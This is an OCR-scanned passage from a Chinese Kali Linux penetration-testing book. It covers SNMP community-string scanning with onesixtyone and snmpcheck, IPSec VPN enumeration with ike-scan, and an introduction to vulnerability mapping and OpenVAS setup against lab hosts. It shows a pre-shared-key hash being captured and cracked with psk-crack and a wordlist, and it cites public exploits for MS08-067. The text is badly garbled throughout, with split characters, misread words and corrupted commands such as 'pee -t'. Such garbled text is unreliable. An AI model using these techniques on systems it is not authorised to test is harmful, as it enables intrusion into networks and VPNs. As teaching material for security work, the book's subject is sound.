建议 您 在 渗透 测试 的 工作 中 检查 SNMP 设 备 ， 可 能 会 遇 到 的 惊喜 。 








6.4.1 onesixtyone 

onesixtyone 程序 是 SNMP 扫描 程序 ， 它 可 扫描 指定 设备 ， 确 定 它 
们 是 否 支 持 某 些 特定 SNMP 字 符 串 。 它 与 其 他 SNMP 扫 描 程 序 不 同 ， 可 
以 以 最 快速 度 〈 间 隔 10 坚 秒 ) 发 送 所 有 的 SNMP 请 求 ， 然 后 等 竺 目标 啊 
应 并 将 之 记录 。 如 果 某 台 设 备 文 持 SNMP 协 议 ， 这 个 设备 就 会 以 包含 
SNMP 字 符 串 的 信息 进行 啊 应 。 

如 需 启动 onesixtyone 程 序 ， 可 在 终端 中 直接 输入 onesixtyone。 

默认 安装 的 Metasploitable 2 并 没有 SNMP 服务 端 程序 。 如 果 这 人 台 主 
机 联 入 网 络 ， 您 可 使 用 下 述 命令 安装 SNMP 服 务 端 程序 。 

apt-get install snmpd 

然后 修改 它 的 配置 文件 /etc/default/snmpd。 

sudo vi /etc/default/snmpd 

找到 含有 SNMPDOPTIONS 的 那 行 ， 删 除 挤 本 机 地 址 127.0.0.1， 然 
后 重启 SNMPD 服 务 。 

sudo /etc/init.d/snmpd restart 

要 注意 的 是 ， 这 人 台 Metaslpoitable 2 的 主机 应 当 与 互联 网 隔绝 开 来 ， 
否则 很 快 将 招致 攻击 。 

而 后 ， 我 们 使 用 onesixtyone 程 序 搜索 192.168.56.103 这 台 主 机 支持 的 
SNMP 字 符 串 。 此 时 我 们 需要 使 用 下 述 指令 。 














onesixtyone 192.168.56.103 

上 述 指令 的 扫 摘 结果 如 下 。 

Scanning 1 hosts, 2 communities 

192.168.56.103 [public] Linux metasploitable 2.6.24-16-server #1 SMP 
Thu Apr 10 13:58:00 UTC 2008 i686 

192.168.56.103 [private] Linux metasploitable 2.6.24-16-server #1 SMP 
Thu Apr 10 13:58:00 UTC 2008 i686 

可 见 这 台 主 机 支持 public 和 private 的 SNMP 字 符 串 。 

如 有 果 需 要 进行 更 细致 的 扫描 ， 可 以 局 用 -d 选 项 。 

onesixtyone -d 192.168.56.103 

上 述 指令 的 返回 结果 如 下 。 

Debug level 1 

Target ip read from command line: 192.168.56.103 

2 communities: public private 

Waiting for 10 milliseconds between packets 

Scanning 1 hosts, 2 communities 

Trying community public 

192.168.56.103 [public] Linux metasploitable 2.6.24-16-server #1 SMP 
Thu Apr 10 13:58:00 UTC 2008 i686 

Trying community private 

192.168.56.103 [private] Linux metasploitable 2.6.24-16-server #1 SMP 
Thu Apr 10 13:58:00 UTC 2008 i686 

All packets sent, waiting for responses. 


done. 


6.4.2 snmpcheck 
如 需 使 用 snmpcheck 程 序 搜集 SNMP 设 备 的 有 关 信 息 ， 可 使 用 下 述 


指令 。 
pee -t 192.168.56.103 
述 指令 获取 的 SNMP 信 息 如 图 6.12 所 示 。 


(*] Try to connect to 192.168.56.103 
[*] Connected to 192.168.56 .103 
[*] Starting enumeration at 2013-07-21 21:23:53 





[*] System information 


Hostname : metasploitable 


Description : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i68 
6 

Uptime system : 27 minutes, 53.74 

Uptime SNMP daemon : 8 minutes, 24.99 

Contact : msfdev@metasploit .com 

Location : Metasploit Lab 

Motd : - 


[*] Devices information 








Id Type Status Description 
1625 Network Running network interface lo 
1626 Network Running network interface ethO 
3072 Coprocessor Running Guessing that there's a floating point co-processor 
768 Processor Unknown GenuineIntel: Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz 


6.5 VPN 枚 举 


在 本 市 中 ， 我 们 将 讨论 虚拟 专用 网 络 VPN) 系统 的 识别 和 扫描 。 
数 年 之 前 ， 当 分 文 机 构 需 要 与 总 部 实现 内 部 通信 时 ， 需 要 在 二 者 之 
间架 设 专用 线路 。 这 种 方法 的 主要 缺点 是 成 本 高 多 。 专 线 的 租用 费用 非 
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所 幸 的 是 ，VPN ”技术 解决 了 这 种 问题 。 分 支 机 构 可 以 使 用 公共 网 
?& (Internet) 通过 VPN 连 接 联 入 总 部 。 相 对 于 租用 专线 而 言 ， 公 共 网 络 
Internet 的 联 入 费用 要 低 很 多 。 同 时 ，VPN 能 够 使 分 支 机 构 像 使 用 本 地 局 
域 网 CLAN) 一 样 使 用 总 部 的 应 用 。 另 外 ，VPN 采取 了 加 密 技术 ， 可 
保护 通信 内 容 的 私密 性 。 

根据 其 所 采用 的 技术 方法 ，VPN 至 少 可 以 分 为 以 下 三 种 。 

e 基于 IPSec 技术 的 VPN: 分 文 机 构 联 入 总 部 局 域 网 的 VPN 解决 方 











案 ， 多 数 是 这 类 方案 。 采 用 这 种 方案 后 ， 分 文 机 构 需 要 在 网 关上 安装 
IPSec VPN 客 户 端 ， 总 部 网 关上 也 要 安装 IPSec VPN 服 务 器 。 由 于 配置 
过 程 十 分 复杂 ， 单 个 用 户 联 入 总 部 网 络 的 方案 通常 不 是 这 种 方案 。 采 用 
这 种 方法 连接 入 单位 局 域 网 的 用 户 ， 通 党 被 叫做 公路 战士 (road 
Warrior) 。 

e OpenVPN: 这 是 一 种 公路 战士 十 分 偏爱 的 VPN 解决 方案 。 采 用 
OpenVPN ”方案 的 客户 端 电 脑 通 过 OpenVPN 客 户 端 连接 到 VPN 的 服务 
器 。 这 种 方案 设置 简单 ， 而 且 不 要 求 用 户 具 有 管理 员 级 别 的 权限 。 

e 基于 SSL 技术 的 VPN: 这 种 方案 不 要 求 用 户 安 装 专用 的 VPN 客户 
端 。 只 要 客户 病 电 脑 装 有 文 持 SSL 连 接 技术 的 Web 浏 览 器 ，VPN 用 户 束 
可 以 通过 浏览 器 连接 到 VPN 服 务 器 。 

ike-scan 

ike-scan 是 探测 、 识 别 并 测试 IPSecVPN 系 统 的 安全 工具 。IPSec 是 特 
别 常见 的 Lan-to-Lan 连 接 技术 ， 同 时 也 是 多 数 VPN 方 案 所 采用 的 远程 访 
问 技术 。 

IPSec 采用 了 下 述 三 种 主要 协议 。 

e Authentication Headers (AH) : 提供 了 数据 的 完整 性 。 

e Encapsulating Security Payloads (ESP) : 保障 数据 的 完整 性 和 保 
性 。 

e Internet Key Exchange (IKE) : 通信 终端 之 间 进 行 参数 协商 的 通 
信 协 议 。 它 用 于 安全 关联 (Security Association) 的 建立 、 维 持 和 终 
is 

IKE 建 立 安全 关联 时 分 为 下 述 几 个 阶段 。 

e IKE phase 1: 在 两 个 IPSec 终端 间 协 商 参数 ， 协 商 加 密 算 法 、 完 
整 性 算法 、 认 证 类 型 、 密 钥 分 发 机 制 、 生 命 周 期 等 ， 以 建立 安全 的 通信 
隧道 。IKE phase 1 会 采用 main mode 或 aggressive mode 建 立 双 问安 全 关 
Eko main mode 通过 3 对 消息 协商 安全 关联 。 相 比 之 下 ，aggressive mode 
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通过 3 对 消息 的 交换 ， 却 能 提供 更 快 的 安全 关联 。 

e IKE phase 2: 用 于 数据 保护 。 

e IKE phase 1.5 或 extended authentication phase: 这 个 阶段 是 可 选 阶 
段 ， 通 常 出 现在 远程 访问 的 VPN 方 案 里 。 

ike-scan 程 序 向 VPN 服 务 器 发 送 IKE phase 1 的 数据 包 ， 然 后 分 析 目 
标 主 机 的 啊 应 数据 。 

ike-scan 程 序 具 备 下 述 几 个 特点 。 

e 能 够 问 任 意 数 量 目标 主机 发 送 IKE 数据 包 。 

能 够 以 灵活 的 方式 组 建 IKE 的 探测 数据 包 。 

E 够 解码 并 显示 所 有 的 服务 器 啊 应 数据 包 。 

e 能 够 配合 psk-crack 工具 破解 预 共享 密 铀 。 

总 而 言 之 ，ike-scan 程 序 具 有 下 述 作用 。 

e 探测 ， 通 过 显示 响应 IKE 请 求 的 主机 ， 搜 索 运 行 IKE 的 主机 。 

e 识别 : 识别 IPSec VPN 服 务 器 采用 的 IKE 实现 手段 。 通 常 ， 啊 应 
言 息 包 含 VPN ”服务 器 厂商 和 型 号 。 这 在 接 下 来 漏洞 分 析 过 程 中 是 十 分 
有 用 的 。 

通常 来 说 ， 只 有 ike-scan 这 类 工具 才能 找到 IPSec VPN 服 务 器 。 因 为 
IPSec 服务 端 程序 并 不 监 昕 TCP 端口 ， 所 以 端口 扫描 程序 不 能 探测 IPSec 
VPN 服 务 器 。 而 且 这 种 服务 器 并 不 会 回复 ICMP unreachable 的 错误 信 
A. PRUAUDP 扫描 程序 也 无 法 搜索 到 IPSec VPN 服 务 器 。 男 外 ， 无 论 是 
向 UDP 500 端口 发 送 随 机 数据 ， 还 是 向 50 号 或 51 SIP 协议 发 送 随 机 数 
据 ， 这 类 服务 器 并 不 进行 任何 响应 。 也 就 是 说 ， 如 果 要 搜索 IPSec VPN 
服务 ， 束 只 能 使 用 发 送 合法 IKE 数 据 包 的 检测 程序 ， 分 析 服 务 器 的 有 关 
响应 。 

如 需 在 终端 中 启动 ike-scan 程 序 ， 可 使 用 下 述 指令 。 

ike-scan 


该 命令 将 在 屏幕 上 显示 指令 说 明和 使 用 范例 。 本 例 将 通过 下 述 指 

















> up um 














令 ， 探 测 、 识 别 、 测 试 一 台 IPSec VPN 服 务 器 。 
ike-scan -M -A -Pike-hashkey 192.168.0.10 
其 中 ， 各 选项 的 作用 分 别 如 下 。 
e -M: payload 的 解码 信息 分 为 多 行 显示 ， 以 便于 阅读 。 
e-A: 使 用 IKE 的 aggressive mode. 
e -P: 将 aggressive mode 的 预 共 享 密 钥 的 哈 希 值 保 存 为 文件 。 


上 述 指令 的 运行 结果 如 图 6.13 所 示 。 

root@kali:~# ike-scan -M -A -Pike-hashkey 192.168.0.10 
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 
192.168.0.10 Aggressive Mode Handshake returned 

HDR=( CKY -R=5 fe7eb4a fa630434) 

SA=(Enc=3DES HashzSHAl Auth=PSK Group=2:modp1024 LifeType=Seconds LifeDu 
ration(4) =0x00007080) 

KeyExchange(128 bytes) 

Nonce(16 bytes) 

ID(Type-ID IPV4 ADDR, Value=192.168.0.10) 

Hash(20 bytes) 

VID-afcad71368alflc96b8696fc77570100 (Dead Peer Detection v1.0) 





Ending ike-scan 1.9: 1 hosts scanned in 0.034 seconds (29.27 hosts/sec). 1 retų 
rned handshake; O returned notify 





图 6.13 
Ht, ÆSA CZAK) payload 中 有 意义 的 信息 如 下 。 
e Encryption: 3DES. 
e Hash: SHA1. 
e Auth: PSK. 
e Diffie-Hellman group: 2. 
e SA life time: 28800 seconds. 
该 指令 将 预 共 孚 密 钥 的 哈 希 值 被 保存 为 ike-hashkey 文 件 。 
之 后 ， 我 们 使 用 psk-crack 程 序 破解 VPN 连 接 的 哈 希 值 。 有 关 指 令 如 


psk-crack —d rockyou.txt ike-hashkey 
此 处 , -d 选 项 用 于 指定 字典 文件 o 
上 述 指令 的 运行 结果 如 图 6.14 所 示 。 





root@kali:~# psk-crack -d rockyou.txt ike-hashkey 

Starting psk-crack [ike-scan 1.9] (http://www.nta-monitor.com/tools/ike-scan/) 
Running in dictionary cracking mode 

key "123456" matches SHA1 hash 74948c512be7950157e6b925f9c426e3e12cc151 

Ending psk-crack: 1 iterations in 0.030 seconds (33.34 iterations/sec 





图 6.14 

上 述 信息 表明 ， 密 钥 是 123456。 您 可 以 使 用 这 个 密 钥 连接 到 VPN 服 
务 器 。 

步 任 务 是 识别 VPN 服 务 器 。 这 时 要 不 断 尝试 各 种 转换 
(transform) 参数 ， 直 到 找到 可 接受 的 参数 为 止 。 

有 关 转 换 参 数 的 详细 介绍 ， 请 参见 http:/www.nta- 
monitor.com/wiki/index.php/Ike- 
scan_User_Guide#Trying_Different_Transforms. 

参考 前 文 的 安全 关联 payload 信 息 ， 我 们 使 用 下 述 指令 进行 识别 。 

ike-scan -M --trans=5,2,1,2 --showbackoff 192.168.0.10 

上 述 指 令 的 运行 结果 如 图 6.15 所 示 。 


root@kali:~# ike-scan -M --trans=5,2,1,2 --showbackoff 192.168.0.10 
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 
192.168.0.10 Main Mode Handshake returned 

HDR=( CKY -R=8cb7b6369d11ae81) 

SA=(Enc=3DES Hash=SHA1 Auth=PSK Group=2:modp1024 LifeType=Seconds LifeDuration(4)= 
0x00007080G) 

VID=4 f45755c645c6a795c5c6170 

VID-afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) 





IKE Backoff Patterns: 


IP Address No. Recv time Delta Time 
192.168.0.10 1 1386775276 .209957 09.000000 

192.168.0.10 2 1386775286.214992 10.005035 
192.168.0.10 3 1386775306 .236889 20.021897 


192.168.0.10 Implementation guess: Linux FreeS/WAN, OpenSwan, strongSwan 


Ending ike-scan 1.9: 1 hosts scanned in 90.086 seconds (0.01 hosts/sec). 1 returned hands 
hake; O returned notif 











图 6.15 
可 见 ，ike-scan 程 序 猜测 远程 VPN 服 务 器 所 用 的 版 本 可 能 是 
FreeS/WAN、OpenSwan 或 strongSwan。 


6.6 Ax 3 


JO = 


本 章 讨 论 服务 枚 举 的 方法 和 用 途 。 这 部 分 内 容 还 介绍 了 以 病 口 扫描 
的 方式 进行 服务 枚 举 的 具体 方法 。 您 相继 接触 到 了 不 同类 型 的 端口 扫 
描 ， 以 及 几 款 常用 的 扫描 工具 ， 例 如 Nmap、Unicornscan 和 Amap 。 接 下 
来 ， 介 绍 了 nbtscan 进 行 SMB 服 务 枚 举 的 方法 ， 和 onesixtyone 和 
Snmpcheck 程 序 进行 SNMP 枚 举 的 方法 。 最 后 绍 了 VPN 枚 举 和 相应 的 扫 
描 工 具 ike-scan。 

在 下 一 章 中 ， 我 们 将 关注 如 何在 目标 环境 中 识别 并 分 析 安 全 漏洞 。 








漏洞 映射 时 在 识别 和 分 析 目 标 环境 中 的 决定 性 安全 缺陷 ， 有 时 也 称 
为 脆弱 性 评估 。 它 是 一 种 在 I 基础 设施 的 安全 控制 中 探寻 已 知 弱 点 的 分 
析 方 法 ， 是 脆弱 性 管理 计划 的 一 个 关键 组 成 部 分 。 测 试 人 员 在 完成 了 信 
妨 收 集 、 目 标识 别 和 服务 枚 举 的 相关 工作 后 ， 就 可 着 手 分 析 目 标 设施 中 
可 能 存在 的 安全 漏洞 。 安 全 漏洞 可 能 导致 目标 系统 发 生 安全 事故 ， 有 害 
于 业务 系统 的 保密 性 、 完 整 性 和 可 用 性 。 

本 章 将 要 讨论 安全 漏洞 的 两 种 常见 类 型 ， 阐 述 安全 漏洞 的 各 种 分 类 
标准 ， 还 会 介绍 Kali Linux 系 统 提 供 的 几 球 著名 的 脆弱 性 分 析 工 具 。 这 
部 分 章节 涵盖 以 下 几 个 主题 。 

e 漏洞 的 两 种 常见 类 型 本 地 漏洞 和 远程 漏洞 。 

e 漏洞 分 类 的 行业 标准 和 分 类 的 依据 。 

e 几 球 有 助 于 查找 并 分 析 目 标 环境 中 存在 的 安全 缺陷 的 安全 工具 。 
本 章 依 据 这 些 工具 在 安全 评估 中 的 主要 功能 对 它们 进行 了 分 类 ， 把 它们 
分 为 OpenVAS TĦ, Cisco 分 析 工 具 、 模 糊 分 析 工 具 、SMB 分 析 工 
有 具 、SNMP 分 析 工 具 和 Web 应 用 程序 分 析 工 具 。 

值得 注意 的 是 ， 在 进行 渗透 测试 〈 包 括 内 部 和 外 部 ) 时 ， 人 工 评估 
和 自动 化 脆弱 性 分 析 都 很 等 重要 。 完 全 依赖 自动 化 测试 工具 获得 的 评估 
结果 ， 可 能 会 有 假 阳性 〈 误 报 ) 和 假 阴性 〈 漏 报 ) 的 情况 。 同 时 ， 审 计 
人 员 对 技术 评估 工具 的 熟悉 程度 同样 影响 着 渗透 测试 工作 的 质量 。 要 保 
障 渗透 工作 的 长 期 质量 ， 要 在 注重 评估 工具 质量 的 同时 ， 不 断 提 高 审计 
人 员 的 技能 水 平 。 本 质 上 说 ， 自 动 化 工具 生成 的 脆弱 性 分 析 结 果 不 可 能 
是 最 终 的 评估 结果 ; 自动 化 工具 不 能 识别 逻辑 错误 、 未 发 现 的 漏洞 、 未 
公布 的 软件 缺陷 ， 以 及 影响 安全 的 人 类 因素 。 因 此 ， 应 当 同 时 结合 自动 
































化 分 机 和 人 工分 析 的 方法 ， 综 合 评估 安全 漏洞 ， 这 将 大 幅度 提升 渗透 测 
试 工作 的 成 功 概 座 。 





按照 产生 缺陷 的 不 同 阶段 ， 漏 洞 可 划分 为 以 下 三 个 大 类 : 设计 类 、 
实施 类 和 运营 类 。 

e 设计 类 漏洞 : 在 软件 设计 阶段 ， 因 软件 规格 指标 设计 不 当 而 产生 
的 安全 弱点 。 

e 实施 类 漏 调 : 位 于 系统 代码 中 的 技术 安全 缺陷 。 

e 运营 类 漏洞 : 由 于 系统 的 配置 或 部 蓟 不当 而 导致 的 安全 漏洞 。 

基于 对 这 三 个 类 别 的 分 析 ， 我 们 总 结 出 了 漏洞 的 两 个 通用 类 型 ， 即 
本 地 漏洞 和 远程 漏洞 。 上 述 三 类 类 漏洞 既 可 以 是 本 地 漏洞 ， 也 可 以 是 远 
程 漏洞 。 

在 上 述 三 类 漏洞 之 中 ， 哪 种 漏洞 问题 最 难 解决 ? 

开发 人 员 根 据 安 全 性 需求 指定 系统 安全 规格 ， 并 依 此 在 实施 过 程 中 
实现 各 种 安全 指标 。 因 此 ， 解 决 设计 类 漏洞 的 时 间 最 长 。 

















攻击 人 员 以 本 地 (物理 ) 访问 方式 ， 通 过 执行 代码 的 手段 才能 触发 
的 漏洞 称 为 “本 地 漏洞 "?。 攻 击 人 员 能 够 利用 这 种 类 型 的 漏洞 提高 自身 的 
访问 权限 ， 不 受 限 制 地 访问 该 计算 机 系统 。 

例如 ，Bob 拥 有 访问 MS Windows Server 2008 (32 位 x86 平台 ) 服 
务 器 的 本 地 权限 。 管 理 员 通过 某 种 安全 策略 限制 了 他 的 访问 权限 ， 禁 止 
他 运行 特定 的 应 用 程序 。 在 极端 条 件 下 ， 他 发 现 亚 意 代 人 码 可 让 他 获取 该 
计算 机 的 系统 级 别 或 内 核 级 别 权 限 。 利 用 了 著名 的 安全 漏洞 (例如 ， 
CVE-2013-0232. GP Trap Handler nt!KiTrap0D) 之 后 ， 他 提升 了 自己 的 











权限 等 级 ， 并 能 够 进行 管理 级 别 的 操作 ， 可 不 受 限 制 地 执行 应 用 程序 。 
这 个 范例 表明 ， 悉 意 的 安全 对 手 可 通过 本 地 漏洞 轻易 地 提升 他 们 访问 计 
算 机 系统 的 权限 。 

有 关 微 软 Windows 权 限 提升 漏洞 CVE-2013-0232 的 详细 资料 ， 请 参 
JLhttp://www.exploit-db.com/exploits/11199/. 








在 物理 上 不 接触 主机 的 情况 下 ， 攻 击 人 员 使 用 恶意 程序 通过 网 络 触 
发 的 系统 漏洞 ， 称 作 远 程 漏洞 。 这 种 类 型 的 漏洞 可 使 得 攻击 人 员 越 过 物 
理 上 的 和 本 地 上 的 限制 ， 获 取 远 程 主机 的 访问 权限 。 

例如 ，Bob 和 Alice 分 别 联 入 互联 网 。 他 们 的 IP 地 址 不 同 ， 分 属 不 同 
的 国家 。 假 设 Alice 的 电脑 运行 的 操作 系统 是 Windows XP, EH T ÆW 
学 认证 技术 。 再 假如 Bob 事先 知道 Alice 主 机 的 操作 系统 和 IP 地 址 。Bob 
极力 想 获取 Alice 电 脑 的 远程 控制 权限 。 同 时 ， 他 了 解 到 可 通过 MS08-67 
漏洞 CWindows Server Service 的 漏洞 ) 远程 攻击 Windows XP 主机 。 

有 关 MS08-67， 即 微软 Windows Server Service 漏 洞 的 详细 信息 ， 请 
Z2 Whttp://www.exploit-db.com/exploits/6841/. 

他 使 用 了 有 关 exploit 程 序 获 取 了 Alice 主 机 的 访问 权限 。 

漏洞 (vulnerability〉 和 漏洞 利用 程序 (exploit〉 的 关系 是 什么 ? 

漏洞 是 系统 上 存在 的 安全 弱点 。 共 计 人 员 可 利用 有 关 漏 洞 或 bug 获 
取 该 主机 的 未 经 授权 的 操作 权限 。 














随 痢 近 些 年 来 技术 领域 的 持续 发 展 ， 人 们 也 在 不 断 总 结 安全 漏洞 的 
各 种 分 类 方法 ， 期 竺 以 最 合理 的 方式 划分 所 有 的 常见 漏洞 。 但 是 ， 就 党 
见 的 影响 系统 安全 的 编程 问题 来 说 ， 还 没有 一 种 分 类 方法 可 以 将 之 完全 


归纳 。 实 际 上 ， 单 一 的 漏洞 可 能 分 别 属于 多 个 类 别 或 类 型 ， 这 是 现今 分 
类 方法 都 解决 不 了 的 问题 。 另 外 ， 每 种 系统 平台 都 需要 与 外 部 环境 进行 
交互 ， 这 又 带 来 分 类 方法 的 关联 性 问题 、 复 杂 性 问题 和 扩展 性 问题 。 如 
下 列表 格 所 示 ， 本 书 列 举 了 多 种 分 类 标准 ， 和 希望 有 助 您 识别 各 种 安全 故 
隐 。 值 得 一 提 的 是 ， 很 多 调查 软件 安全 性 问题 的 安全 评估 工具 ， 已 经 条 
取 了 这 些 漏洞 分 类 方法 。 


安全 分 类 标准 有 关 链 接 











HP 软件 安全 标准 http://www.hpenterprisesecurity.com/vulncat/en/vulncat/ind- 
ex.html 
Seven pernicious kingdoms http://www.cigital.com/papers/download/bsill-taxonomy.pdf 


Common Weakness Enumeration http://cwe.mitre.org/data/index.html 


OWASP TOP 10 http://www.owasp.org/index.php/Category:OWASP Top Ten Project 
http://www.klocwork.com/products/documentation/Insight-9.1/ 
Klocwork 
Taxonomy 
GrammaTech http://www.grammatech.com 
WASC 威胁 分 类 法 http://projects.webappsec.org/Threat-Classification 





上 述 各 种 分 类 方法 ， 分 别 以 各 目的 方式 将 安全 漏洞 进行 分 类 ， 以 帮 
助 信息 安全 有 关 人 员 和 研发 人 员 识 别 那些 可 能 会 影响 系统 安全 性 的 特定 
音 误 。 因 此 ， 这 些 分 类 方法 并 不 具备 学 术 上 的 完备 性 和 精确 性 。 


7.3 OpenVAS 





OpenVAS 是 一 球 封 装 了 多 种 安全 工具 和 安全 服务 的 软件 ， 是 一 个 强 
大 的 漏洞 绾 理 平台 。 它 采用 了 客户 端 /服务 器 的 框架 。 其 客户 端 测 试 目 
标 主 机 网 络 漏洞 的 一 系列 操作 ， 都 是 通过 服务 器 端 程序 实现 的 。 它 的 设 
计 莱 备 模 块 化 和 稳定 性 的 特点 ， 文 持 并 行 安全 测试 ， 且 兼容 多 种 操作 系 
Zt (Linux/Win32) 。OpenVAS 的 核心 组 件 和 主要 功能 如 下 。 

e OpenVAS scanner( 扫 摘 器 〉: 负责 管理 、 执 行 各 种 网 络 漏洞 测 
iX (NVT, Network Vulnerability Test) 。NVT 的 订阅 服务 提供 每 日 更 
新 。 整 个 平台 可 通过 订阅 服务 更 新 测试 插件 (参见 





http://www.openvas.org/nvt-feeds.html) 。 

e OpenVAS Client CAP m) : 即 传统 形式 的 保 面 客 工 具 和 命令 行 
TH (CLI)〉。 它 通过 OTP 协 议 (OpenVAS Transfer Protocol) 控制 扫描 
器 。OTP 相 当 于 OpenVAS scanner 的 前 段 通 信 协 议 。 

e OpenVAS Manager (管理 程序 ) : 漏洞 扫 摘 平台 的 中 央 控 制服 
务 。 管 理 程序 仅 负 责 集 中 存储 配置 文件 和 存储 扫 朱 结果 。 此 外 ， 它 的 
OMP 协议 COpenVAS Management Protocol) 完全 基于 XML， 可 用 于 各 
种 用 途 。OMP 可 用 于 设置 扫 拉 计划、 生成 测试 报告 、 筛 选 扫描 结果 和 
聚合 活动 。 

e Greenbone Security Assistant (ZEF) : 工作 于 OMP 的 Web 
服务 。 它 用 于 加 用 户 提 供 一 种 基于 OMP 的 Web 客 户 端 ， 方 便 用 户 配 置 、 
管理 、 控 制 具体 的 扫 揪 操作 。 它 的 加 面 版 客户 端 程 序 叫做 GSA 
Desktop， 功 能 完全 一 样 。 此 外 ，OpenVAS CLI (命令 行 工 具 ) 还 支持 
在 文本 命令 行 下 运行 OMP 协 议 的 指令 。 

e OpenVAS administrator: 负责 用 户 管 理 和 订阅 更 新 。 

OpenVAS 使 用 的 工具 

OpenVAS 集 成 的 工具 清单 如 下 。 

安全 工具 简介 


Amap 应 用 层 协议 的 检测 工具 
IKE-scan IPSec VPN 的 扫描 、 识 别 和 测试 工具 











续 表 


安全 工具 简介 























LdapSearch 从 LDAP 目录 种 获取 信息 的 工具 
Nikto Web 服务 器 评估 工具 

Nmap 端口 扫描 程序 

Ovaldi 开放 式 漏洞 与 评估 语言 转换 程序 
pnscan 端口 扫描 程序 

Portbunny 端口 扫描 程序 

Seccubus OpenVAS 常规 扫描 的 自动 化 工具 


多 球 本 地 安全 审计 工具 ,包括 John-the-Ripper. Chkrootkit, ClamAV , Snort, Logwatch, Tripwire. 


SLAD Lsof, Tiger, TrapWatch 和 LM-sensors 
SNMPwalk SNMP 数据 采集 程序 

Strobe 端口 扫描 程序 

w3af Web 程序 攻击 与 审计 框架 


设置 OpenVAS 的 关键 步骤 如 下 。 

1， 在 桌面 菜单 中 依 此 选中 Kali Linux | Vulnerability Analysis | 
OpenVAS | Openvas check setup， 并 按照 程序 的 向 导 进 行 操作 ， 以 确定 
本 机 已 经 正确 安装 了 OpenVAS 程 序 。 然 后 按照 提示 ， 用 默认 的 选项 设 
置 证 书 等 项 目 ; 仅 建议 您 在 完全 理解 这 些 工 具 的 情况 下 进行 自 定 义 设 
置 。 在 您 完成 了 每 个 FIX 修 复 ) 操作 之 后 ， 您 需要 重新 运行 一 次 
openvas check setup， 直 到 它 提 示 您 已 经 成 功 配 置 好 了 这 个 程序 。 如 图 
7.1 所 示 ， 您 同样 可 以 在 命令 行 窗口 里 局 动 这 个 程序 。 

2.， 在 提 面 菜单 中 依 此 选中 Kali Linux | Vulnerability Analysis | 
OpenVAS | Openvas check setup， 创 建 一 个 OpenVAS 扫描 所 需 的 用 户 账 
号 。 在 程序 询问 Authentication (pass/cert) 时 直接 用 回 车 键 跳 过 该 设 
置 。 在 创建 账号 的 最 后 一 步 ， 程 序 会 要 您 为 新 建 账号 创建 规则 。 如 果 您 
不 需要 设置 特定 规则 ， 可 使 用 Ctrl+D 键 直接 退出 。 如 果 您 要 进行 相应 设 
置 ， 可 通过 下 述 指令 查看 有 关 设 置 的 帮助 文件 。 

# man openvas-adduser 

3. 在 主机 联 入 互联 网 的 情况 下 ， 通 过 NVT 的 订阅 服务 更 新 
OpenVAS 的 插件 ， 即 在 更 面 染 单 中 依次 选中 Kali Linux 





























|VulnerabilityAssessment | OpenVAS | OpenVas NVTSync. 

4. 接 下 来 就 需要 启动 OpenVAS INARA YM Fer. PLATES) Jm REAP BE 
够 进行 操作 。 在 更 面 染 单 中 依次 选中 Kali = Linux | Vulnerability 
Assessment | OpenVAS | OpenVas Server， 并 等 待 程序 加 载 完 毕 。 


openvas -check -Setup 2.2.3 
Test completeness and readiness of OpenVAS-6 
(add '--v4', '--v5' or '--v7' 
if you want to check for another OpenVAS version) 








Please report us any non-detected problems and 
help us to improve this check routine: 
http://1ists.wald.intevation.org/mailman/listinfo/openvas-discuss 


Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the proble 


Use the parameter --server to skip checks for client tools 
like GSD and OpenVAS-CLI. 


Step 1: Checking OpenVAS Scanner ... 
OK: OpenVAS Scanner is present in version 3.4.0. 
ERROR: No CA certificate file of OpenVAS Scanner found. 
FIX: Run 'openvas-mkcert'. 


ERROR: Your OpenVAS-6 installation is not yet complete! 


Please follow the instructions marked with FIX above and run this 
script again. 


If you think this result is wrong, please report your observation 

and help us to improve this check routine: 
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss 

Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the 
problem. 


root@kali:-~# 





图 7.1 
5. Bia, A aaOpenVAS Pinker. ERIS, Se Se He 
依次 选中 Kali Linux | Vulnerability Assessment | OpenVAS | OpenVas 
Client。 在 客户 端 界面 窗口 出 现 之 后 ， 选 择 File | Connect 连 接 到 
OpenVAS Server， 然 后 输入 在 第 1 步 和 第 2 步 里 设置 的 账号 信息 。 
如 图 7.2 所 示 ， 在 客户 端 程序 中 输入 登录 信息 ， 以 连接 到 OpenVAS 
Server 


接 下 来 要 设置 的 参数 是 目标 主机 、 选 择 合适 的 插件 、 提 供 登录 所 需 





的 凭据 ， 并 指定 必要 的 访问 规则 (如 第 2 步 所 述 ) 。 设 置 好 全 局 设置 之 
后 ， 在 菜单 中 选中 File | Scan Assistant， 并 输入 4 个 主要 步骤 〈 任 务 、 范 
围 、 目 标 以 及 执行 ) 的 详细 佑 息 。 在 测试 目标 系统 之 前 ， 系 统 将 提示 指 
定 登 录 和 凭证， 随后 程序 会 进行 测试 工作 。 您 选择 的 评估 标准 ， 决 定 了 漏 
洞 评估 的 时 间 长 度 。 在 完成 评估 的 以 后 ， 程 序 会 显示 本 次 任务 的 评估 报 
a CULAI7.3) « 

本 例 中 ， 扫 描 任 务 的 名 称 是 CustomerUK。 在 程序 窗口 顶部 的 菜单 
里 ， 选 择 Report | Export 导 出 扫描 报告 ， 此 时 可 以 选择 适合 的 报告 格式 
(如 NBE、XML、HTML、LaTex、TXT 或 PDF) 。OpenVAS 是 一 个 功 
能 强大 的 漏洞 评估 软件 ， 它 不 仅 能 够 在 评估 目标 系统 的 决定 性 安全 问 
题 ， 而 且 还 能 生成 内 容 全 面 的 扫描 报告 。 它 的 报告 含有 风险 计量 、 漏 洞 
细节 、 解 决 方案 和 相关 网 上 资源 等 信息 。 














OpenVAS Server 
Hostname: Port: 


[localhost [9390 B Default | 


Authentication 
Login: 


[sampletest 


Password: 


[eeeeeeeeee — — — 


[ ] Authentication by certificate 


Trusted CA: 
[jusrlocalivar/libjopenvas/CA/cacert.pem Select = 


Conhectifig . 


Connecting to OpenVAS server "localhost" ... 


Receiving dependencies: spoo 
tomes Se | 
图 7.2 





OpenVAS-Client 
